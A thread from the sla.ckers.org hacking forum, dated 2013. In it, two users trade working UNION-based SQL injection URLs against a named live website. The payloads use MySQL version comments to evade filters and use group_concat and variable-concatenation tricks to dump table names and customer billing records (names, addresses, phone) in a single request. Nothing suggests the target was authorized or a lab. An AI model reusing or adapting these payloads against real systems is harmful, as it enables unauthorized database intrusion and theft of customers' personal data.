Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: kenjii
Date: December 07, 2013 08:37AM

hi all it's me again :)

i'am having 2 problem with this website :

http://www.atpcb.com/atp/categories.php?p_cat=0

i can get it like this :
http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!50000Group_Concat(table_name)*/,4,5,6,7,8,9,10,11,12+from+/*!information_schema*/.tables+where+table_schema=database()

but i reach the 1024 limit
so i use ajkiro syntax for dump in 1 shoot :

http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,(/*!50000SeLeCt*/(@x) from (/*!50000SeLeCt*/(@x:=0x00), (@running_number:=0),(/*!50000SeLeCt*/(0) from ( /*!50000information_schema*/.tables ) where (table_schema=database()) and (0x00) in (@x:=concat (@x,0x3c62723e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x2e20,table_name))))x),4,5,6,7,8,9,10,11,12

ok this work fine i do the same for get the column and it work fine too.

Now my problem number one is :

How i do for get the data from column with dump in 1 shoot ?
I mean i can get data but i still reach 1024 limit and can't get all...
I try many thing but none seem to work with me :(


My 2nd problem is -> i can't get data from 1 column, the column "phone" from table x_billing.

with this sqli

http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!50000Group_Concat(first_name,last_name,address_1,address_2,city,state,zip_code,country)*/,4,5,6,7,8,9,10,11,12+from+x_billing

i get all data but if i add "phone" column in more it don't work

I also try to get the phone column alone not working too

i alredy see some other website with similar problem but i can't resolve it...

how can i get this data ?
Sorry for my bad english



Edited 1 time(s). Last edit at 12/07/2013 03:59PM by kenjii.

Options: ReplyQuote
Re: dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: ajkaro
Date: December 11, 2013 01:07PM

Here you go:

hXXp://wXw.at[SLACKERS]pcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,concat (0x3c2f7469746c653e, (/*!50000SeLeCt*/(@) from(/*!50000SeLeCt*/(@:=0x00) ,(/*!50000SeLeCt*/(@) from(x_billing)where(@) in (@:=concat (@,0x0a,first_name,0x3a,last_name,0x3c62723e))))a),0x3c7469746c653e),4,5,6,7,8,9,10,11,12 -- -

Number of records with phone is 0 !!!
hXXp://wXw.at[SLACKERS]pcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,concat (0x3c2f7469746c653e, (/*!50000SeLeCt*/count(*) from(x_billing) where phone is not null) ,0x3c7469746c653e),4,5,6,7,8,9,10,11,12 -- -

Options: ReplyQuote
Re: dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: kenjii
Date: December 13, 2013 11:23AM

thank you very much

on other website when there is no data in column it simply write nothing and don't block me for get other data txh again for this info

Options: ReplyQuote
Re: dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: ajkaro
Date: December 13, 2013 02:25PM

When there is no data in some column and you are concatenating data from that column to some other column data remember:

CONCAT() returns NULL if any of those data is NULL !!!!

Options: ReplyQuote


Sorry, only registered users may post in this forum.